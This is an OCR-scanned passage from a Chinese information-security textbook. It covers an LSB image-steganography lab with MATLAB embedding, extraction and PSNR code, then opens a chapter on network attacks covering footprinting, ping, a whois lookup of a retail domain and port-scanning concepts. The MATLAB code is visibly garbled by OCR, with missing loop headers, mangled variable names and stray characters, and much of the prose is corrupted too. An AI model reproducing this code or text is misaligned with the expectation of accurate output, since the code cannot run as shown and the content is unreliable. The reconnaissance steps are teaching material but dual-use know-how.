并 不 敏感 。 替 换 技术 就 是 利用 这 个 原理 ,通过 使 用 秘密 信息 比特 替换 随机 噪声 ,从 而 实现 信 
息 隐 藏 目的 。 

在 BMP 灰 度 图 像 的 位 平面 中 ,每 个 像素 值 为 8 位 二 进 制 ,表示 该 点 亮度 。 图 像 高 位 平 
面 对 图 像 感官 质量 起 主要 作用 ,去 除 图 像 最 低 几 个 位 平面 并 不 会 造成 画面 质量 的 明显 下 降 。 
利用 这 个 原理 可 用 秘密 信息 (或 称 水 印信 息 ) 替 代 载 体 图 像 低 位 平面 以 实现 信息 嵌入 。 本 算 
法 选用 最 低位 平面 来 嵌入 秘密 信息 。 最 低位 平面 对 图 像 的 视觉 效果 影响 最 轻微 ,但 很 容易 
受 噪 声 影 响 和 攻击 ,可 采用 宛 余 嵌入 的 方式 来 增强 稳健 性 加 以 解决 , 即 在 一 个 区 域 (多 个 像 
素 ) 中 能 人 相同 的 信息 ,提取 时 根据 该 区 域 中 的 所 有 像素 判断 。 


/ 实 训 步 又 


1. 隐藏 ,提取 及 测试 
算法 分 为 3 个 部 分 实现 : 隐藏 算法 提取 算法 和 测试 脚本 。 
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(1) 隐藏 算法 。 源 代码 hide_lis. m 如 下 : 


function o = hide lsb(block, data, I) 
% function o= hide lsb(block, data, I) 
隐藏 提取 及 测试 
#% block: 隐 藏 的 最 小 分 块 大 小 
% data: 秘 密 信息 
$I: 原始 载体 
si= size(I); 
lend = length(data) ; 
N= floor(si(2)/block(2)); 名 将 图 像 划 分 为 Mx 个 小 块 
M= min(floor(si(1)/block(1)), ceil(lend/N)); 
o=1; 
oz oo s% 计算 每 小 块 隐藏 的 秘密 信息 
rst=ixblock(1)+1; 
red= (i+1)*block(1); 
for j=0:N-1 s% 计算 每 小 块 隐藏 的 秘密 信息 的 序号 
idx=ixN+j+li 
if idx > lend 
break; 
end 
名 取 每 小 块 隐藏 的 秘密 信息 
bit = data( idx); 
名 计算 每 小 块 水 平方 向 起 止 位 置 
cst=jxblock(2) +1; 
ced= (j+1) * block(2); 
名 将 每 小 块 最 低位 平面 蔡 换 为 秘密 信息 
o(rst:red,cst:ced) = bitset(o(rst:red,cst:ced),1, bit); 
end 
end 


(2) 提取 算法 。 源 代码 dh_lsb. m 如 下 : 


function out = dh_lsb(block, I) 
% function out = dh_lsb(block, I) 
名 源 代码 dh_lsb.m 如 下 : 
%block: 隐藏 的 最 小 分 块 大 小 
s#I: 携 密 载体 
si= size(I); 
名 将 图 像 划 分 为 Mx 个 小 块 
N= floor(si(2)/block(2)); 
M= floor(si(1)/block(2)); 
out=[]; 
计算 比特 1 判决 冰 值 : 每 小 块 半数 以 上 元 素 隐藏 是 比特 1 时 ,判决 该 小 块 谋 入 信息 为 1 
thr = ceil( (block(1) * block(2) + 1)/2); 
idx= 0; 
Tor 和 
名 计算 每 小 块 垂直 方向 起 止 位 置 
rst=ix*block(1) +1; 
red= (i+1)*block(1); 
for j=0:N-1 
名 计算 每 小 块 将 要 隐藏 数据 的 秘密 信息 的 序号 
idx=ixN+j+1; 
名 计算 每 小 块 水 平方 向 起 止 位 置 
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cst=jx*block(2)+1; 
ced= (j+1)* block(2); 
名 提取 小 块 最 低位 平面 ,统计 1 比特 个 数 ,判决 输出 秘密 信息 
tmp = sum(sum(bitget(I(rst : red,cst : ced),1))); 
if (tmp>= thr) 
out(idx) =1; 
else 
out(idx) = 0; 
end 
end 
end 


(3) 测试 脚本 。 源 代码 test. m 如 下 : 


fid=1; 
len= 10; 随机 生成 要 隐藏 的 秘密 信息 
d= randsrc(1, len, [0 1]); 
block = [3,3]; 
[fn, pn] = uigetfile({'* .bmp', 'bmp file( * .bmp)';}, "选择 载体 '); 
s= imread(strcat(pn, fn)); 
ss= size(s); 
if (length(ss)>= 3) 
I= rgb2gray(s); 
else 
I=s; 
end 
si= size(I); 
SN = floor(si(1)/block(1)) * floor(si(2)/block(2)); 
tN = length(d); % 如 果 载 体 图 像 尺 寸 不 足以 隐藏 秘密 信息 , 则 在 垂直 方向 上 复制 填充 图 像 
if sSN < tN 
multiple = ceil (tN/sN); 
tmp=[]; 
for i=1 : multiple 
tmp= [tmp;I]; 
end 
I= tmp; 
end 
$$ 调用 隐藏 算法 ,把 携 密 载体 写 至 硬盘 
stegoed = hide_lsb(block, d, I); 
imwrite( stegoed, 'hide. bmp', ‘bmp'); 
[fn,pn] = uigetfile({'* .bmp', 'bmp file( * .bmp) ';}, ' 选 择 隐 项 载体 '); 
Y= imread(strcat (pn, fn)); 
sy= size(y); 
if (length(sy) > 3) 
I= rgb2gray(y); 
else 
I=y; 
end 
调用 提取 算法 ,获得 秘密 信息 
out = dh_lsb(block,I);# 计算 误 码 率 
len= min(length(d), length(out)); 
rate= sum(abs(out(1:len) - d(1:1en)))/len; 
Y=1- rate; 
fprintf(fid, 'LSB:len: % d\t error rate: % f\t error num: % d\n',len, rate, len* rate); 
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2. 计算 峰值 信 噪 比 
(1) 峰值 信 噪 比 定义 : 
PSNR = XY max bay 


(2) 峰值 信 噪 比 画 数 。 源 代码 psnr m 如 下 。 


function y= psnr(org, stg) 
y=0; 
sorg = size(org); 
sstg= size( stg); 
if sorg~ = sstg 
fprint(1, 'org and stg must have same size! \n'); 
end 
np= sum(sum( (org— stg).^2))7 
Y= 10* log10(max(max(double((org.^2)) * sorg(1) * sorg(2)/np))); 


(3) 测试 脚本 。 
org = imread( 'lena. bmp'); 


stg = imread( 'hide. bmp'); 
fprintf(1, 'psnr = : % f\n', psnr(org, stg)); 


/ 实 训 总 结 
依据 所 编写 的 代码 ,运行 测试 脚本 test. m, 具 体 过 程 如 图 4-17 一 图 4-19 所 示 。 


~ lbmpfile( .bmp)( .bmp) ~ 
EE 


4-17 选择 测试 载体 图 像 
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上 < 实验 四 LSB 图 像 信 -。， LSB 图 你 信息 降 疫 (二 ) ”| 好 首 其 雪 158 瑟 疾 舍 号 总 专 ( 二 ) p 


图 4-18 选择 隐蔽 载体 文件 


Command Window © 
>> test 
LSB:len: 10 error rate: 0.000000 error nun: 0 
>> test_psnr 
psnr=:58. 946563 


ft» 


图 4-19 测试 代码 运行 结果 


从 图 4-19 可 以 看 出 ,此 次 代码 运行 中 LSB: len 二 10, 表 明 可 以 隐藏 的 最 大 信息 量 为 
10 比特 ; error rate 和 error num 表明 误 码 率 和 出 错 的 隐藏 比特 数 为 0; 而 psnr 二 58. 946568 
表明 本 次 测试 的 峰值 信 噪 比 为 58. 946568 ,说 明 本 次 载体 图 像 在 LSB 位 平面 加 载 秘密 信息 
后 失真 度 较 低 ,是 一 个 比较 理想 的 状态 。 


本 章 小 结 


(1) 信息 隐藏 是 将 秘密 信息 隐藏 在 另 一 非 机 密 的 载体 信息 中 ,通过 公共 信道 进行 传递 。 
秘密 信息 隐藏 后 ,攻击 者 无 法 判断 载体 信息 中 是 否 隐 藏 了 秘密 信息 ,也 无 法 从 载体 信息 中 提 
取 或 去 除 所 隐藏 的 秘密 信息 。 信 息 隐 藏 研究 的 内 容 包括 隐 写 术 ( 隐 藏 算法 ) ,版权 标识 、 隐 通 
道 和 匿名 通信 等 。 隐 写 术 是 指 把 秘密 信息 嵌入 到 看 起 来 普通 的 载体 信息 (尤其 是 多 媒体 信 
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息 ) 中 ,用 于 存储 或 通过 公共 网 络 进行 通信 的 技术 。 古 代 隐 写 术 包括 技术 性 的 隐 写 术 、 语 言 
学 中 的 隐 写 术 和 用 于 版 权 保护 的 隐 写 术 。 

(2) 信息 隐藏 的 目的 在 于 把 机 密 信息 隐藏 于 可 以 公开 的 信息 载体 之 中 。 信 息 载体 可 以 
是 任何 一 种 多 媒体 数据 ,如 音频 、 视 频 、 图 像 ,甚至 文本 数据 等 ,被 隐藏 的 机 密 信息 也 可 以 是 
任何 形式 。 信 息 隐 藏 涉及 两 个 算法 : 信息 嵌入 算法 和 信息 提取 算法 。 常 见 的 信息 隐藏 算法 
有 空间 域 算 法 和 变换 域 算法 。 

(3) 数字 水 印 是 在 数字 化 的 信息 载体 ( 指 多 媒体 作品 ) 中 嵌入 不 明显 的 记号 (包括 作品 
的 版 权 所 有 者 和 发 行者 等 ) ,其 目的 不 是 为 了 隐藏 或 传递 这 些 信 息 ,而 是 在 发 现 资 版 或 发 生 
知识 产权 纠纷 时 ,用 来 证 明 数 字 作品 的 真实 性 。 被 嵌入 的 标识 与 源 数 据 紧 密 结合 并 隐藏 其 
中 ,成 为 源 数据 不 可 分 离 的 一 部 分 ,并 可 以 经 历 一 些 不 破坏 源 数据 的 使 用 价值 的 操作 而 存活 
下 米 。 

(4) 隐 通 道 是 指 系统 中 利用 那些 本 来 不 是 用 于 通信 的 系统 资源 , 绕 过 强制 存 取 控 制 进 
行 非法 通信 的 一 种 机 制 。 根 据 隐 通道 的 形成 ,可 分 为 存储 隐 通 道 和 时 间 隐 通道 ; 根据 隐 通 
道 是 否 存在 噪声 ,可 分 为 噪声 隐 通 道 和 无 噪声 隐 通 道 ; 根据 隐 通 道 所 涉及 的 同步 变量 或 信 
息 的 个 数 ,可 分 为 聚集 隐 通 道 和 非 聚集 隐 通 道 。 隐 通道 的 主要 分 析 方法 有 信息 流 分 析 方 法 、 
非 干扰 分 析 方 法 和 共享 资源 矩阵 方法 。 

(5) 匿名 通信 是 指 通过 一 定 的 方法 将 业务 流 中 的 通信 关系 加 以 隐藏 ,使 窃听 者 无 法 直 
接 获知 或 推 知 双 方 的 通信 关系 或 通信 双方 身份 的 一 种 通信 技术 。 匿 名 通信 的 重要 目的 就 是 
隐藏 通信 双方 的 身份 或 通信 关系 ,从 而 实现 对 网 络 用 户 个 人 通信 及 对 涉 密 通信 的 更 好 的 
保护 。 


. 简 述 信息 隐藏 技术 的 发 展 历史 。 

. 试 说 明 隐 写 术 与 加 密 技术 的 相同 点 和 不 同 点 。 

. 简 述 信息 隐藏 技术 的 分 类 与 特性 。 

. 请 说 明 数 字 水 印 戏 入 和 提取 的 原理 ,并 举例 说 明日 常生 活 中 的 可 见 水 印 和 不 可 见 


必 性 


水 印 。 
5. 试 说 明 隐 通道 的 主要 分 析 方 法 。 
6. 试 说 明基 于 重 路 由 技术 的 匿名 通信 服务 原理 。 
7. 搜集 相关 文献 ,举例 说 明 当 前 对 信息 隐藏 技术 的 需求 及 主要 的 技术 手段 和 特点 。 
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随 着 互联 网 的 迅猛 发 展 ,一 些 “ 信 息 垃圾 “邮件 炸弹 “病毒 木马 “网 络 黑客 ”等 越 来 越 
多 地 威胁 着 网 络 的 安全 ,而 网 络 攻击 是 最 重要 的 威胁 来 源 之 一 ,有 效 地 防范 网 络 攻击 势 在 必 
行 ,为 此 需要 真正 了 解 网 络 攻击 的 各 种 技术 ,只 有 这 样 才 能 在 网 络 攻防 中 做 到 知己 知 彼 , 百 
战 不 列 。 


5.1 网 络 攻击 概述 


5.1.1 网 络 攻 击 的 目标 


网 络 攻击 的 目标 主要 有 系统 和 数据 两 类 ,其 所 对 应 的 安全 性 也 涉及 系统 安全 和 数据 安 
全 两 个 方面 。 

系统 型 攻击 的 特点 : 攻击 发 生 在 网 络 层 , 破 坏 系 统 的 可 用 性 ,使 系统 不 能 正常 工作 。 可 
能 留 下 明显 的 攻击 痕迹 ,用 户 会 发 现 系统 不 能 工作 。 

数据 型 攻击 的 特点 : 发 生 在 网 络 的 应 用 层 ,面向 信息 ,主要 目的 是 修改 和 偷 取信 息 ,不 
会 留 下 明显 的 痕迹 。 


5.1.2 网 络 攻击 的 手段 


目前 ,攻击 网 络 的 手段 种 类 繁多 ,而 且 新 的 手段 层出不穷 ,网 络 攻击 可 以 分 为 以 下 两 
大 类 。 

一 类 是 主动 攻击 ,这 种 攻击 以 各 种 方式 获取 攻击 目标 的 相关 信息 , 找 出 系统 漏洞 ,侵入 
系统 后 ,将 会 有 选择 地 破坏 信息 的 有 效 性 和 完整 性 ,如 邮件 炸弹 。 

另 一 类 是 被 动 攻击 ,这 种 攻击 是 在 不 影响 网 络 正 常 工 作 的 情况 下 ,进行 截获 .窃取 、 破 译 
以 获得 重要 机 密 信息 ,其 中 包括 窍 听 和 通信 流量 分 析 , 如 扫描 器 。 

当前 网 络 攻击 采用 的 主要 手段 : 利用 目前 网 络 系统 及 各 种 网 络 软件 的 漏洞 ,如 基于 
TCP/IP 协议 本 身 的 不 完善 .操作 系统 的 种 种 缺陷 等 ; 防火 墙 设置 不 当 ; 电子 欺诈 ; 拒绝 服 
务 ( 包 括 DDoS); 网 络 病毒 ; 使 用 黑客 工具 软件 ; 利用 用 户 自己 安全 意识 薄弱 ,如 口令 设置 
不 当 ; 或 直接 将 口令 文件 放 在 系统 等 。 


5.1.3 ”网 络 攻击 层次 


网 络 攻击 所 使 用 的 方法 不 同 ,产生 的 危害 程度 也 不 同 ,一 般 分 为 7 个 层次 。 
(1) 简单 拒绝 服务 。 

(2) 本 地 用 户 获 得 非 授 权 读 权限 。 

(3) 本 地 用 户 获 得 非 授 权 写 权限 。 


100 信息 安全 与 技术 (第 2 版 ) 


(4) 远程 用 户 获得 非 授权 账号 信息 。 

(5) 远程 用 户 获得 特权 文件 的 读 权限 。 

(6) 远程 用 户 获得 特权 文件 的 写 权 限 。 

(7) 远程 用 户 拥有 了 系统 管理 员 权 限 。 

在 这 七 层 中 , 随 着 层 号 增 大 ,危害 的 程度 加 重 。 


5.1.4 ”网络 攻击 分 类 


1. 阻塞 类 攻击 

阻塞 类 攻击 企图 通过 强制 占有 信道 资源 、 网 络 连接 资源 .存储 空间 资源 ,使 服务 器 骨 溃 
或 资源 耗 尽 无 法 对 外 继续 提供 服务 。 拒 绝 服务 攻击 (Denial of Service, DoS) 是 典型 的 阻塞 
类 攻击 , 它 是 一 类 个 人 或 多 人 利用 Internet 协议 组 的 某 些 工具 ,拒绝 合法 用 户 对 目标 系统 
(如 服务 器 ) 和 信息 的 合法 访问 的 攻击 。 

常见 的 方法 有 TCP SYN 洪 泛 攻击 、Land 攻击 .Smurf 攻击 .电子 邮件 炸弹 等 。 

DoS 攻击 的 后 果 : 使 目标 系统 死机 ; 使 端口 处 于 停顿 状态 ; 在 计算 机 屏幕 上 发 出 杂 
乱 信 息 、 改 变 文件 名 称 、 删 除 关 键 的 程序 文件 ; 扭曲 系统 的 资源 状态 ,使 系统 的 处 理 速度 
降低 。 

2. 探测 类 攻击 

信息 探测 类 攻击 主要 是 收集 目标 系统 的 各 种 与 网 络 安全 有 关 的 信息 ,为 下 一 步 和 人 侵 提 
供 帮 助 。 主 要 包括 扫描 技术 、 体 系 结构 刺探 ,系统 信息 服务 收集 等 。 目 前 正在 发 展 更 先进 的 
网 络 无 踪迹 信息 探测 技术 。 

网 络 安全 扫描 技术 : 网 络 安全 防御 中 的 一 项 重要 技术 ,其 原理 是 采用 模拟 攻击 的 形式 
对 目标 可 能 存在 的 已 知 安全 漏洞 进行 逐 项 检查 。 它 既 可 用 于 对 本 地 网 络 进行 安全 增强 ,也 
可 被 网 络 攻击 者 用 来 进行 网 络 攻击 。 

3. 控制 类 攻击 

控制 类 攻击 是 一 类 试图 获得 对 目标 机 器 控制 权 的 攻击 。 

最 常见 的 3 种 : 口令 攻击 、 特 洛 伊 木 马 、 缓 冲 区 溢出 攻击 。 口 令 截获 与 破解 仍然 是 最 有 
效 的 口令 攻击 手段 ,进一步 的 发 展 应 该 是 研制 功能 更 强 的 口令 破解 程序 ; 木马 技术 目前 着 
重 研究 更 新 的 隐藏 技术 和 秘密 信道 技术 ; 缓冲 区 溢出 是 一 种 常用 的 攻击 技术 ,早期 利用 系 
统 软件 自身 存在 的 缓冲 区 溢出 的 缺陷 进行 攻击 ,现在 研究 制造 缓冲 区 溢出 。 

4. 欺骗 类 攻击 

欺骗 类 攻击 包括 IP 欺骗 和 假 消息 攻击 ,前 一 种 攻击 通过 冒充 合法 网 络 主机 骗取 敏感 信 
息 ,后 一 种 攻击 主要 是 通过 配置 或 设置 一 些 假 信息 来 实施 欺骗 攻击 。 主 要 包括 ARP 缓存 
虚构 .DNS 高 速 缓存 污染 伪造 电子 邮件 等 。 

5. 漏洞 类 攻击 

漏洞 (hole) : 系统 硬件 或 者 软件 存在 某 种 形式 的 安全 方面 的 脆弱 性 ,这 种 脆弱 性 存在 
的 直接 后 果 是 允许 非法 用 户 未 经 授权 获得 访问 权 或 提高 其 访问 权限 。 针 对 扫描 器 发 现 的 网 
络 系统 的 各 种 漏洞 实施 的 相应 攻击 ,伴随 新 发 现 的 漏洞 ,攻击 手段 不 断 翻 新 ,防不胜防 。 要 
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找到 某 种 平台 或 者 某 类 安全 漏洞 也 是 比较 简单 的 。 在 Internet 上 的 许多 站 点 ,不 论 是 公开 
的 还 是 秘密 的 ,都 提供 漏洞 的 归档 和 索引 等 。 

6. 破坏 类 攻击 

破坏 类 攻击 是 指 对 目标 机 器 的 各 种 数据 与 软件 实施 破坏 的 一 类 攻击 ,包括 计算 机 病毒 、 
逻辑 炸弹 等 攻击 手段 。 人 逻辑 炸弹 与 计算 机 病毒 的 主要 区 别 : 人 逻辑 炸弹 没有 感染 能 力 , 它 不 
会 自动 传播 到 其 他 软件 内 。 由 于 我 国 使 用 的 大 多 数 系统 都 是 国外 进口 的 ,因此 对 其 中 是 否 
存在 逻辑 炸弹 ,应 该 保持 一 定 的 警惕 。 对 于 机 要 部 门 中 的 计算 机 系统 ,应 该 以 使 用 自己 开发 
的 软件 为 主 。 


5.1.5 网 络 攻击 的 一 般 模型 


对 一 般 情况 而 言 , 网 络 攻 击 通常 遵循 同一 种 行为 模型 ,都 要 经 过 搜集 信息 ,获取 权限 、 清 
除 痕迹 和 深入 攻击 等 几 个 阶段 ,如 图 5-1 所 示 。 然 而 一 些 高 明 的 入 侵 者 会 对 自己 隐藏 的 更 
好 ,利用 "* 佛 偶 机 ?来 实施 攻击 ,入 侵 成 功 后 还 会 把 入 侵 痕 迹 清除 干净 ,并 留 下 后 门 为 以 后 实 
施 攻击 提供 方便 。 


搜集 信息 =| 获取 权限 一 | 清除 痕迹 一 | 深入 攻击 


图 5-1 网 络 攻击 的 一 般 模型 


5.2 信息 搜集 技术 


在 攻击 者 对 特定 的 网 络 资源 进行 攻击 以 前 ,他 们 需要 了 解 将 要 攻击 的 环境 ,这 需要 搜集 
汇总 各 种 与 目标 系统 相关 的 信息 ,包括 机 器 数目 .类 型 .操作 系统 等 。 踩 点 和 扫描 的 目的 都 
是 进行 信息 的 搜集 。 

使 用 各 种 扫描 工具 对 入 侵 目 标 进行 大 规模 扫描 ,得 到 系统 信息 和 运行 的 服务 信息 ; 利 
用 第 三 方 资源 对 目标 进行 信息 搜集 ,如 常见 的 搜索 引擎 ; 利用 各 种 查询 手段 得 到 与 被 入 侵 
目标 相关 的 一 些 信 息 , 如 社会 工程 学 (social engineering)。 社 会 工程 学 通常 是 利用 大 众 的 
玖 于 防范 的 诡计 ,让 受害 者 掉 入 陷阱 。 该 技巧 通常 以 交谈 ,欺骗 \ 假 冒 或 口语 用 字 等 方式 ,从 
合法 用 户 中 套 取 敏感 的 信息 。 

攻击 者 搜集 目标 信息 一 般 采用 7 个 基本 步骤 ,每 一 步 均 有 可 利用 的 工具 ,攻击 者 使 用 它 
们 得 到 攻击 目标 所 需要 的 信息 。 

(1) 找到 初始 信息 。 

(2) 找到 网 络 的 地 址 范围 。 

(3) 找到 活动 的 机 器 。 

(4) 找到 开放 端口 和 入 口 点 。 

(5) 和 弄 清 操作 系统 。 

(6) 和 弄 清 每 个 端口 运行 的 是 哪 种 服务 。 

(7) 画 出 网 络 图 。 
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信息 搜集 的 主要 方式 有 以 下 几 种 。 

(1) 隐藏 地 址 : 攻击 者 首先 寻找 可 以 利用 的 别人 的 计算 机 , 当 作 ”* 倪 偶 机 ”, 隐 藏 自己 真 
实 的 IP 地 址 等 位 置信 息 。 

(2) 锁定 目标 : 网 络 上 有 许多 主机 ,攻击 者 接 下 来 的 工作 就 是 寻找 并 确定 目标 主机 。 

(3) 了 解 目标 的 网 络 结构 : 确定 要 攻击 的 目标 后 ,攻击 者 就 会 设法 了 解 其 所 在 的 网 络 
结构 信息 ,包括 网 关 路 由 、 防 火 墙 , 人 侵 检测 系统 (IDS) 等 ,最 简单 的 就 是 用 tracert 命令 追踪 
路 由 ,也 可 以 发 一 些 数据 包 看 其 是 否 能 通过 来 猜测 防火 墙 过 滤 规 则 的 设 定 等 。 

(4) 收集 系统 信息 : 在 了 解 了 网 络 结构 信息 之 后 ,攻击 者 会 对 主机 进行 全 面 的 系统 分 
析 , 以 寻求 该 主机 的 操作 系统 类 型 .所 提供 服务 及 其 安全 漏洞 或 安全 弱点 ,攻击 者 可 以 使 用 
一 些 扫 描 器 工具 ,轻松 获取 目标 主机 运行 的 操作 系统 及 版 本 ,系统 里 的 账户 信息 , WWW 、 
FTP、Telnet ,SMTP 等 服务 器 程序 是 何 种 版 本 和 服务 类 型 ,端口 开放 情况 等 资料 ,主要 方 
法 有 端口 扫描 、 服 务 分 析 , 协 议 分 析 和 用 户 密码 探测 等 。 


5.2.1 网 络 踩点 


踩点 就 是 通过 各 种 途径 对 所 要 攻击 的 目标 进行 多 方面 的 了 解 ,包括 任何 可 得 到 的 蛛 丝 
马 迹 ,但 要 确保 信息 的 准确 ,以 确定 攻击 的 时 间 和 地 点 。 

常见 的 踩点 方法 有 以 下 几 种 。 

(1) 域名 及 其 注册 机 构 的 查询 。 

(2) 公司 性 质 的 了 解 。 

(3) 对 主页 进行 分 析 。 

(4) 邮件 地 址 的 搜集 。 

(5) 目标 IP 地 址 范围 查询 。 

踩点 的 目的 就 是 探 察 对 方 的 各 方面 情况 ,确定 攻击 的 时 机 。 摸 清 对 方 最 薄弱 的 环节 和 
守卫 最 松散 的 时 刻 ,可 为 下 一 步 的 入 侵 制定 良好 的 策略 。 

在 一 些 情 况 下 ,公司 会 在 不 知 不 觉 中 泄露 了 大 量 信息 。 公 司 认 为 是 一 般 公 开 的 及 能 争 
取 客户 的 信息 ,这 种 信息 一 般 被 称 为 开放 来 源 信息 ,但 它 也 能 被 攻击 者 利用 。 

开放 的 来 源 是 关于 公司 或 者 它 的 合作 伙伴 的 一 般 、 公 开 的 信息 ,任何 人 能 够 得 到 。 这 意 
味 着 存 取 或 者 分 析 这 种 信息 比较 容易 ,并 且 没 有 犯罪 的 因素 ,是 很 合法 的 。 例 如 ,公司 新 闻 
信息 ,如 某 公司 为 展示 其 技术 的 先进 性 和 能 为 客户 提供 最 好 的 监控 能 力 、 容 错 能 力 、 服 务 速 
度 ,往往 会 不 经 意 间 汇 露 了 系统 的 操作 平台 、 交 换 机 型 号 及 基本 的 线路 连接 。 又 如 ,公司 员 
工 信 息 , 大 多 数 公司 网 站 上 附 有 姓名 地 址 德 ,在 上 面 不 仅 能 发 现 CEO 和 财务 总 监 , 还 可 能 知 
道 公司 的 总 裁 或 主管 是 谁 。 还 有 ,一 些 公司 新 闻 组 ,现在 越 来 越 多 的 技术 人 员 使 用 新 闻 组 、 
论坛 来 帮助 解决 公司 的 问题 ,攻击 者 看 这 些 要 求 并 把 他 们 与 电子 信箱 中 的 公司 名 匹配 ,这 样 
就 能 提供 一 些 有 用 的 信息 。 使 攻击 者 知道 公司 有 什么 设备 ,也 帮助 他 们 揣测 出 技术 支持 人 
员 的 水 平等 。 

对 于 攻击 者 而 言 ,任何 有 域名 的 公司 必定 泄露 某 些 信息 。 例 如 ,大 多 数 的 DNS 服务 器 
允许 用 户 获取 域名 记录 文件 内 容 , 这 样 就 可 以 了 解 到 网 站 的 详细 网 络 分 布 结 构 。 另 外 网 络 
服务 商 可 以 查询 得 到 公司 地 址 及 人 员 内 容 邮件 电话 ,以 及 单位 注册 的 IP 范围 等 重要 信息 。 
有 时 这 一 步 比 扫描 还 重要 。 


入 
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信息 收集 的 工具 软件 有 以 下 几 种 。 

(1) Ping fping、ping sweep。 

(2) ARP 探测 。 

(3) Finger。 

(4) Whois。 

(5) DNS/nslookup, 

(6) 搜索 引擎 (Google 百度 ) 。 

(7) Telnet。 

想 要 得 到 一 个 网 络 IP 地 址 ,最 简单 的 方法 是 Ping 域名 。Ping 一 个 域名 时 ,程序 做 的 第 
一 件 事情 是 设法 把 主机 名 解析 为 IP 地 址 并 输出 到 屏幕 。 攻 击 者 得 到 网 络 的 地 址 ,能 够 把 此 
网 络 当 作 初始 点 。 

【 例 5-1】 Ping 新 浪 网 站 的 域名 。 


C:\> Ping www. sina. com. cn 
Pinging tucana. sina. com. cn [60. 28.175.227] with 32 bytes of data: 


Reply from 60, 28.175.227: bytes = 32 time = 44ms TIL = 53 
Reply from 60.28.175.227: bytes = 32 time = 43ms TIL = 53 
Reply from 60. 28.175.227: bytes = 32 time = 44ms TIL = 53 
Reply from 60.28.175.227: bytes = 32 time = 46ms TIL = 53 


Ping statistics for 60.28.175.227: 
Packets: Sent =4, Received= 4, Lost =0 (0% loss)， 
Approximate round trip times in milli - seconds: 


Minimum = 43ms, Maximum = 46ms, Average = 44ms 


Ping 主要 有 以 下 作用 和 特点 。 

(1) 用 来 判断 目标 是 否 活动 。 

(2) 最 常用 .最 简单 的 探测 手段 。 

(3) Ping 程序 一 般 是 直接 实现 在 系统 内 核 中 的 ,而 不 是 一 个 用 户 进程 。 

另 一 个 有 效 的 搜索 工具 是 Whois。 攻 击 者 会 对 一 个 域名 执行 Whois 程序 以 找到 附加 
的 信息 。UNIX 的 大 多 数 版 本 装 有 Whois, 对 于 Windows 操作 系统 ,要 执行 Whois 查找 , 需 
要 一 个 第 三 方 的 工具 ,如 Sam Spade。 通 过 查看 Whois 的 输出 ,攻击 者 会 得 到 一 些 非常 有 用 
的 信息 : 得 到 一 个 物理 地 址 一些 人 名 和 电话 号 码 ( 可 利用 来 发 起 一 次 社交 工程 攻击 )。 非 
常 重要 的 是 通过 Whois 可 获得 攻击 域 的 主要 的 (及 次 要 的 ) 服 务 器 IP 地 址 。 

【 例 5-2〗 利用 Sam Spade 学 习 Whois 使 用 。 

首先 ,安装 并 启动 Sam Spade 软件 ,在 地 址 栏 输入 "www. vipshop. com”( 唯 品 会 的 域 
名 ) ,如 图 5-2 所 示 。 

然后 , 单 击 Whios 图 标 ,执行 Whios www. vipshop. com, 结 果 如 下 。 
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克 Spade - [Spade Log] 
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图 5-2 Spade 软件 示意 图 


Registrant: 
vipshop. com 
31, east fangcun road, 
guangzhou, guangdong 510370 
CN 


Domain Name: VIPSHOP. COM 


Administrative Contact, Technical Contact, Zone Contact: 
vipshop. com 
vipshop china 
31, east fangcun road, 
guangzhou, guangdong 510370 
CN 
02022330000 
it@vipshop. com 


Domain created on 29 — Jan 一 2003 
Domain expires on 29 -Jan ~ 2020 
Last updated on 26 ~ Dec — 2012 


Domain servers in listed order: 
NS30. VIPSHOP. COM 
NS7. VIPSHOP. COM 
NS8. VIPSHOP. COM 
Domain registration and hosting powered by DomainDiscover 


Rs low as $9/year, including FREE: responsive toll - free support, 
URL/frame/email forwarding, easy management system, and full featured DNS. 


以 上 结果 显示 ,通过 Whois 可 以 搜集 到 更 多 的 信息 。 
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5.2.2 网 络 扫描 


1. 网 络 扫描 概述 

扫描 技术 是 主要 的 一 种 信息 搜集 类 攻击 。 网 络 扫描 的 目的 就 是 利用 各 种 工具 对 踩点 所 
确定 的 攻击 目标 的 IP 地 址 或 地 址 段 的 主机 查找 漏洞 。 扫 描 采 取 模 拟 攻 击 的 形式 对 目标 可 
能 存在 的 已 知 安全 漏洞 逐 项 进行 检查 ,目标 可 以 是 工作 站 、 服 务 器 交换机、 路 由 器 和 数据 库 
应 用 等 。 根 据 扫描 结果 向 扫描 者 或 管理 员 提 供 周 密 可 靠 的 分 析 报 告 。 扫 描 分 成 两 种 策略 : 
一 种 是 主动 式 策略 ; 另 一 种 是 被 动 式 策略 。 

被 动 式 策略 就 是 基于 主机 之 上 ,对 系统 中 不 合适 的 设置 .脆弱 的 口令 及 其 他 同安 全 规则 
抵触 的 对 象 进行 检查 。 主 动 式 策略 是 基于 网 络 的 , 它 通过 执行 一 些 脚本 文件 模拟 对 系统 进 
行 攻击 的 行为 并 记录 系统 的 反应 ,从 而 发 现 其 中 的 漏洞 。 

被 动 式 扫描 不 会 对 系统 造成 破坏 ,而 主动 式 扫描 对 系统 进行 模拟 攻击 ,可 能 会 对 系统 造 
成 破坏 。 
主动 式 扫描 一 般 可 以 分 为 以 下 几 种 。 

(1) 活动 主机 探测 。 

(2) ICMP 查询 。 

(3) 网 络 PING 扫描 。 

(4) 端口 扫描 。 

(5) 标识 UDP 和 TCP 服务 。 

(6) 指定 漏洞 扫描 。 

(7) 综合 扫描 。 

扫描 方式 也 可 以 分 成 两 大 类 : 慢 速 扫描 和 乱 序 扫描 。 

慢 速 扫描 : 对 非 连 续 端 口 进行 扫描 ,并 且 源 地 址 不 一 致 , 时 间 间 隔 长 ,没有 规律 的 扫描 。 
由 于 一 般 扫描 侦 测 器 的 实现 是 通过 监视 某 个 时 间 里 一 台 特 定 主 机 发 起 的 连接 的 数目 (如 每 
秒 10 次 ) 来 决定 是 否 在 被 扫描 ,这 样 黑客 可 以 通过 使 用 扫描 速度 慢 一 些 的 扫描 软件 进行 
扫描 。 

乱 序 扫描 : 对 连续 的 端口 进行 扫描 , 源 地 址 一 致 ,时 间 间 隔 短 的 扫描 。 

2. 网 络 扫 描 工 具 

网 络 扫 描 工 具 是 一 种 能 够 自动 检测 远程 或 本 地 主机 安全 弱点 的 程序 ,通过 它 可 以 获得 
远程 计算 机 的 各 种 端口 分 配 及 提供 的 服务 和 它们 的 版 本 。 扫 描 器 工作 时 是 通过 选用 不 同 的 
TCP/IP 端口 的 服务 ,并 记录 目标 主机 给 予 的 应 答 ,以 此 搜集 到 关于 目标 主机 的 各 种 有 用 信 
息 的 。 

